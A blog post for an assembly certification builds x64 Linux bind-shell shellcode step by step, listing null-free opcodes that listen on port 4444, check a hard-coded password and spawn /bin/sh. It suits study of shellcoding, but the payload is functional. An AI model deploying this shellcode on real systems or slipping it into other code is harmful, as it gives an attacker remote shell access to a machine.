

X64 Linux Bind TCP Shellcode with Authentication

Jul 22, 2018 | 11 minutes read

Tags: assembly, slae-64, shellcode

This post is the first of seven that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to one of seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving into OSCE.

Assignment #1 Requirements


  • Create bind TCP shellcode
    • Binds to a TCP port
    • When a client connects, client must send a password for authentication
    • If password is correct, execute the shell
  • Remove null-bytes (0x00) from the bind TCP shellcode discussed as part of the course
  • Compress the size of the shellcode as much as possible

A Word on Size

I used nasmshell to figure out which instruction combinations produced the fewest bytes without any nulls. For this assignment, I only used techniques taught in the course or found in documentation; I didn’t look at other shellcode examples beyond what the course covered. My reasoning was that this would establish a performance baseline for myself. After I complete some of the other assignments that require me to analyze other people’s shellcode, I plan to come back and apply whatever fancy tricks I pick up to this shellcode.

General Steps to Listen

The general steps to set up a listening socket map onto a handful of Linux syscalls, listed below.

  1. socket -> Create a socket
  2. bind -> Bind the socket to a local address
  3. listen -> Listens; prepares the socket to accept a connection
  4. accept -> Creates a new connected socket

After the accept syscall, operations may be performed on the socket such as recv/read and send/write. If you’re looking for a more in depth explanation of socket programming using syscalls, do yourself a favor and check out Beej’s Guide to Network Programming.
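
For comparison, the same four steps can be sketched with Python’s socket module, which wraps these syscalls. This is only an illustration and not part of the shellcode: the helper name make_listener, the loopback address, and the use of port 0 (which asks the kernel for any free port) are assumptions made for the example.

```python
import socket

def make_listener(host="127.0.0.1", port=0, backlog=1):
    """Run socket -> bind -> listen and return the listening socket."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # 1. socket
    srv.bind((host, port))                                   # 2. bind
    srv.listen(backlog)                                      # 3. listen
    return srv

def accept_one(srv):
    """4. accept: block until a client connects, return the connected socket."""
    conn, _peer = srv.accept()
    return conn
```

The socket returned by accept_one is the one that read/recv and write/send operate on; the listening socket only hands out connections.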

x64 Assembly Calling Conventions

To pass parameters to a syscall (since that is all this post is concerned with), up to six registers may be used; they are shown below in the order in which they are populated. The syscall number itself is stored in rax. Note that the fourth register is r10 rather than the rcx used for ordinary function calls, because the syscall instruction overwrites rcx.

  1. rdi
  2. rsi
  3. rdx
  4. r10
  5. r8
  6. r9


The following image illustrates that to use a C function definition, the arguments it accepts directly correspond to the registers above when read from left-to-right. I show this as a quick reference to assist in reading the assembly and syscall definitions below.

[Image: calling conventions]
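
As a quick sketch of that mapping, the snippet below pairs a syscall number and its arguments with registers. The helper name assign_registers is made up for illustration; the register order follows the Linux x86-64 syscall ABI, where the fourth argument goes in r10.

```python
# Registers for Linux x86-64 syscall arguments, in order.
SYSCALL_ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")

def assign_registers(number, *args):
    """Map a syscall number and its arguments onto registers."""
    if len(args) > len(SYSCALL_ARG_REGS):
        raise ValueError("a syscall takes at most six arguments")
    regs = {"rax": number}
    regs.update(zip(SYSCALL_ARG_REGS, args))
    return regs

# socket(AF_INET, SOCK_STREAM, 0) is syscall 41
print(assign_registers(41, 2, 1, 0))
```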

Create a Socket

The first step in creating a bind shell on Linux is to create a socket. Below you can see that the syscall number for socket is 41, and that it takes three ints as arguments. socket() creates an endpoint for communication and returns a file descriptor that refers to that endpoint.

#define __NR_socket 41

int socket(int domain, int type, int protocol);
/*
 * rax -> 41 -> socket syscall
 * rdi -> 2 (AF_INET) -> domain
 * rsi -> 1 (SOCK_STREAM) -> type
 * rdx -> 0 -> protocol
 */

Python can be used to determine the values of the constants you would normally see used in C socket programming code.

>>> import socket
>>> socket.AF_INET
2
>>> socket.SOCK_STREAM
1
>>> socket.INADDR_ANY
0

First up, the original shellcode with null-bytes. On the left are the opcodes generated by the corresponding assembly instructions on the right. The gist of this snippet is that a socket is created with the socket syscall and the resulting file descriptor is stored in the rdi register. The resulting shellcode is 25 bytes long to make this single syscall and it’s riddled with null-bytes.

b8 29 00 00 00       	mov    eax,0x29
bf 02 00 00 00       	mov    edi,0x2
be 01 00 00 00       	mov    esi,0x1
ba 00 00 00 00       	mov    edx,0x0
0f 05                	syscall
48 89 c7             	mov    rdi,rax

Here is what I was able to come up with. 14 bytes long and no nulls.

6a 29                	push   0x29
58                   	pop    rax
6a 02                	push   0x2
5f                   	pop    rdi
6a 01                	push   0x1
5e                   	pop    rsi
31 d2                	xor    edx,edx
0f 05                	syscall
97                   	xchg   edi,eax    ; store file descriptor in rdi
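
A small Python sketch can double-check the two byte counts and the null-byte claim. The helper name describe is hypothetical; the hex strings are copied from the two listings above.

```python
def describe(hex_bytes):
    """Return (length, null_count) for a string of hex-encoded opcodes."""
    code = bytes.fromhex(hex_bytes)
    return len(code), code.count(0)

# Opcodes copied from the original and the compacted socket snippets.
original = "b829000000 bf02000000 be01000000 ba00000000 0f05 4889c7"
compact = "6a29 58 6a02 5f 6a01 5e 31d2 0f05 97"

print(describe(original))
print(describe(compact))
```

The same helper works for any of the later sections by pasting in the opcode column.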

Bind the Socket

When a socket is created with socket(), it exists in a name space (address family) but has no address assigned to it. bind() assigns the address specified by addr to the socket referred to by the file descriptor sockfd. This and all following sections will follow the same pattern as the first where the socket was created.

#define __NR_bind 49

int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
/* rax -> 49
 * rdi -> fd already stored in rdi
 * rsi -> pointer to 16 bytes of space groomed to contain a sockaddr_in struct
 * rdx -> length of the struct rsi points to (16)
 */

struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */
};

Python can be used to convert a numeric port number into a format that sockaddr_in will understand.

>>> import socket
>>> port = 4444
>>> hex(socket.htons(port))
'0x5c11'

Original shellcode: 41 bytes

; prepare the 16 bytes to pass as sockaddr using the stack               
48 31 c0             	xor    rax,rax
50                   	push   rax
89 44 24 fc          	mov    DWORD PTR [rsp-0x4],eax
66 c7 44 24 fa 11 5c 	mov    WORD PTR [rsp-0x6],0x5c11
66 c7 44 24 f8 02 00 	mov    WORD PTR [rsp-0x8],0x2
48 83 ec 08          	sub    rsp,0x8

; make bind syscall
b8 31 00 00 00       	mov    eax,0x31
48 89 e6             	mov    rsi,rsp
ba 10 00 00 00       	mov    edx,0x10
0f 05                	syscall

My shellcode: 24 bytes

; prepare the 16 bytes to pass as sockaddr using the stack
; two pushes of the zeroed rdx give 16 zero bytes, so the high byte of
; sin_family (the 00 between 02 and the port) and sin_addr are already zero
52                   	push   rdx
52                   	push   rdx
66 c7 44 24 02 11 5c 	mov    WORD PTR [rsp+0x2],0x5c11
c6 04 24 02          	mov    BYTE PTR [rsp],0x2
48 89 e6             	mov    rsi,rsp

; make bind syscall
6a 31                	push   0x31
58                   	pop    rax
6a 10                	push   0x10
5a                   	pop    rdx
0f 05                	syscall
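
To see what those 16 bytes look like once the stack writes are done, here is a minimal Python sketch that builds the same layout. The function name sockaddr_in_bytes is an assumption for the example; the layout assumes a little-endian x86-64 host, INADDR_ANY as the address, and eight bytes of zero padding.

```python
import socket
import struct

def sockaddr_in_bytes(port, family=socket.AF_INET):
    """Pack family, port and INADDR_ANY into a 16-byte sockaddr_in image."""
    return (
        struct.pack("<H", family)    # sin_family, little-endian on x86-64
        + struct.pack("!H", port)    # sin_port, network byte order
        + bytes(4)                   # sin_addr = INADDR_ANY (0.0.0.0)
        + bytes(8)                   # zero padding up to 16 bytes
    )

print(sockaddr_in_bytes(4444).hex())
```

The first four bytes come out as 02 00 11 5c, which is what the byte write at [rsp] and the word write at [rsp+0x2] produce on top of the zeroed stack slots.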

Listen on the Bound Socket

listen() marks the socket referred to by sockfd as a passive socket, that is, as a socket that will be used to accept incoming connection requests using accept(2).

#define __NR_listen 50

int listen(int sockfd, int backlog);
/* rax -> 50
 * rdi -> fd already stored in rdi
 * rsi -> 1
 */

Original shellcode: 12 bytes

b8 32 00 00 00       	mov    eax,0x32
be 02 00 00 00       	mov    esi,0x2
0f 05                	syscall

My shellcode: 8 bytes

6a 32                	push   0x32
58                   	pop    rax
6a 01                	push   0x1
5e                   	pop    rsi
0f 05                	syscall

Accept a Connection

The accept() system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.

The argument sockfd is a socket that has been created with socket(), bound to a local address with bind(), and is listening for connections after a listen().

#define __NR_accept 43

int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
/* rax -> 43
 * rdi -> fd already stored in rdi
 * rsi -> pointer to 16 bytes of space that will be populated with the client’s address
 * rdx -> pointer to the length of that buffer (16)
 */

struct sockaddr_in {
    sa_family_t    sin_family; /* address family: AF_INET */
    in_port_t      sin_port;   /* port in network byte order */
    struct in_addr sin_addr;   /* internet address */
};

Original shellcode: 29 bytes

b8 2b 00 00 00       	mov    eax,0x2b
48 83 ec 10          	sub    rsp,0x10
48 89 e6             	mov    rsi,rsp
c6 44 24 ff 10       	mov    BYTE PTR [rsp-0x1],0x10
48 83 ec 01          	sub    rsp,0x1
48 89 e2             	mov    rdx,rsp
0f 05                	syscall
49 89 c1             	mov    r9,rax

My shellcode: 19 bytes

6a 2b                	push   0x2b
58                   	pop    rax
99                   	cdq                 ; zero out rdx using sign extension
52                   	push   rdx
52                   	push   rdx
48 89 e6             	mov    rsi,rsp      ; the client's address will be written to the buffer rsi points to
6a 10                	push   0x10
48 8d 14 24          	lea    rdx,[rsp]
0f 05                	syscall

; store client socket descriptor in r9 to restore after closing the parent
49 91                	xchg   r9,rax

Close the Listener

This is the first section where I added additional logic to satisfy the authentication requirement. The close_call label gets reused in the event of a bad password. close() closes a file descriptor, so that it no longer refers to any file and may be reused.

#define __NR_close 3

int close(int fd);
/* rax -> 3
 * rdi -> fd already stored in rdi
 */

Original shellcode: 10 bytes

b8 03 00 00 00       	mov    eax,0x3
0f 05                	syscall
4c 89 cf             	mov    rdi,r9

My shellcode: 15 bytes

6a 03                	push   0x3
58                   	pop    rax
0f 05                	syscall

; restore client socket descriptor to rdi
4c 89 cf             	mov    rdi,r9       

; on the first pass jump ahead to read_call; after a bad password
; fall through and exit (syscall 60)
74 07                	je     4000d2 <read_call>
6a 3c                	push   0x3c
58                   	pop    rax
0f 05                	syscall

Read in the Password

For this section, there is no original shellcode. I’ll just outline what mine is doing. read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

#define __NR_read 0

ssize_t read(int fd, void *buf, size_t count);
/* rax -> 0
 * rdi -> client fd already stored in rdi
 * rsi -> pointer to a 24-byte buffer on the stack
 * rdx -> 24 (size of the buffer)
 */

Python can be used to prepare the password to be stored on the stack.

>>> import binascii
>>> binascii.hexlify(b'letmein\n'[::-1])
'0a6e69656d74656c'

I wrote a small bash function that wraps the Python above so I don’t have to open an interactive interpreter each time I want a different string.

flipstring() {
    python3 -c "import binascii; print(binascii.hexlify(b'${1}'[::-1]).decode())"
}

The two primary tasks here are to get user-input and compare it to our password.

; read the password
31 c0                	xor    eax,eax      ; zero out rax for the syscall number
48 83 ec 18          	sub    rsp,0x18     ; allocate 24 bytes on the stack
48 89 e6             	mov    rsi,rsp      ; make rsi point to those 24 bytes
6a 18                	push   0x18         
5a                   	pop    rdx          ; store the size of the buffer in rdx
0f 05                	syscall

; compare the password
48 b8 6c 65 74 6d 65 	movabs rax,0xa6e69656d74656c    ; password -> letmein\n
69 6e 0a
48 8d 3e             	lea    rdi,[rsi]                ; point rdi at the user input
48 af                	scas   rax,QWORD PTR es:[rdi]   ; compare rax with the 8 bytes at [rdi]
4c 89 cf             	mov    rdi,r9                   ; put client connection back in rdi
75 cf                	jne    4000c1 <close_call>      ; close socket if they're not equal
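
The comparison can be modeled in Python to make two details visible: the password has to be exactly 8 bytes to fit in rax, and only the first 8 bytes the client sends are checked. This is a rough model rather than a translation of the assembly, and the names as_immediate and password_matches are invented for the example.

```python
PASSWORD = b"letmein\n"  # exactly 8 bytes, so it fits one 64-bit register

def as_immediate(data):
    """Value a little-endian CPU sees when it loads these 8 bytes."""
    if len(data) != 8:
        raise ValueError("expected exactly 8 bytes")
    return int.from_bytes(data, "little")

def password_matches(received):
    """Mimic the scas check: only the first 8 bytes are compared."""
    return received[:8] == PASSWORD

print(hex(as_immediate(PASSWORD)))
```

One consequence of the 8-byte compare is that anything the client sends after the password in the same read is ignored by the check.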

Duplicate File Descriptors

The dup2() system call creates a copy of the file descriptor oldfd, using the descriptor number specified in newfd rather than the lowest-numbered unused one that dup() would pick. If newfd was already open, it is silently closed before being reused. After a successful return, the old and new file descriptors may be used interchangeably.

#define __NR_dup2 33

int dup2(int oldfd, int newfd);
/* rax -> 33
 * rdi -> client socket
 * rsi -> 2 -> 1 -> 0 (3 iterations)
 */

Original shellcode: 36 bytes

b8 21 00 00 00       	mov    eax,0x21
be 00 00 00 00       	mov    esi,0x0
0f 05                	syscall
b8 21 00 00 00       	mov    eax,0x21
be 01 00 00 00       	mov    esi,0x1
0f 05                	syscall
b8 21 00 00 00       	mov    eax,0x21
be 02 00 00 00       	mov    esi,0x2
0f 05                	syscall

My shellcode: 20 bytes

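As a side note, I really thought I was going to be able to make a small loop reusing rcx as the file descriptor, but it didn’t turn out quite the way I thought it would. The syscall instruction overwrites rcx, so the counter has to be saved and restored around every call, and the descriptor ends up in its own register. I think this is a place in the code that I will return to for some easy improvement later.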

6a 03                	push   0x3
59                   	pop    rcx      ; # of iterations
6a 02                	push   0x2
5b                   	pop    rbx      ; used as file descriptor
00000000004000f8 <dup2_loop>:
6a 21                	push   0x21     
58                   	pop    rax
89 de                	mov    esi,ebx  ; 2 -> 1 -> 0 (3 iterations)
51                   	push   rcx      ; preserve counter across syscalls
0f 05                	syscall
59                   	pop    rcx
48 ff cb             	dec    rbx      
e2 f2                	loop   4000f8 <dup2_loop>
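
In higher-level terms, the loop does something like the following Python sketch. The function name redirect_onto is hypothetical, and os.dup2 stands in for the raw syscall.

```python
import os

def redirect_onto(src_fd, targets=(2, 1, 0)):
    """Make every descriptor in `targets` refer to the same file as `src_fd`."""
    for newfd in targets:          # same order as the loop: 2 -> 1 -> 0
        os.dup2(src_fd, newfd)
```

With the default targets this replaces the calling process’s own stderr, stdout and stdin, which is exactly what the shellcode wants before exec’ing a shell; when experimenting, passing spare descriptors instead is safer.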

Exec /bin/sh

I modified this section a bit, but there wasn’t a whole lot of room for improvement that I could see. execve() executes the program pointed to by filename.

#define __NR_execve 59

int execve(const char *filename, char *const argv[], char *const envp[]);
/* rax -> 59
 * rdi -> "/bin//sh", 0x0
 * rsi -> [addr of "/bin//sh"], 0x0
 * rdx -> 0x0
 */

Original shellcode: 32 bytes

48 31 c0             	xor    rax,rax
50                   	push   rax
48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
2f 73 68
53                   	push   rbx
48 89 e7             	mov    rdi,rsp
50                   	push   rax
48 89 e2             	mov    rdx,rsp
57                   	push   rdi
48 89 e6             	mov    rsi,rsp
48 83 c0 3b          	add    rax,0x3b
0f 05                	syscall

My shellcode: 28 bytes

31 d2                	xor    edx,edx
52                   	push   rdx
48 bb 2f 62 69 6e 2f 	movabs rbx,0x68732f2f6e69622f
2f 73 68
53                   	push   rbx
48 89 e7             	mov    rdi,rsp
52                   	push   rdx
57                   	push   rdi
48 89 e6             	mov    rsi,rsp
48 8d 42 3b          	lea    rax,[rdx+0x3b]
0f 05                	syscall
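
The doubled slash in /bin//sh is there to pad the path to exactly 8 bytes, so it fills a whole register without introducing a null. A short Python check, offered as an illustration only, shows where the movabs constant comes from and why the 7-byte path would not work as well.

```python
path = b"/bin//sh"                      # doubled slash pads the path to 8 bytes
value = int.from_bytes(path, "little")  # what movabs loads into rbx

short = b"/bin/sh".ljust(8, b"\x00")    # the 7-byte path needs a null to fill 8

print(hex(value))
print(0 in path, 0 in short)
```

The kernel treats repeated slashes in a path as a single separator, so /bin//sh resolves to the same file as /bin/sh.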

fin

Once the call to execve happens, the client has a shell on the system. As for the compression and null-removal parts of the assignment, the nulls were successfully removed, and the final byte tally is:

  • Original shellcode: 185 bytes
  • My shellcode: 162 bytes
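
The totals can be reproduced by summing the per-section sizes. The sketch below takes its numbers from the listings in this post; the 34 bytes for the password section is counted from the opcode column, since that section has no stated total, and the original is given 0 there because it has no password check.

```python
# (original, mine) byte counts per section, read off the listings in this post.
# The "read" entry for mine is counted from the read-and-compare opcodes.
SIZES = {
    "socket": (25, 14),
    "bind":   (41, 24),
    "listen": (12, 8),
    "accept": (29, 19),
    "close":  (10, 15),
    "read":   (0, 34),
    "dup2":   (36, 20),
    "execve": (32, 28),
}

original_total = sum(orig for orig, _ in SIZES.values())
my_total = sum(mine for _, mine in SIZES.values())

print(original_total, my_total, original_total - my_total)
```

Leaving out the 34-byte password section, the remaining sections come to 128 bytes against the original 185.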

I’m still confident that there is a lot of room for improvement on my part. My plan is to revisit the first and second assignments and apply any new concepts I learn while performing the shellcode analysis of later assignments. Feel free to check out the source code.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository

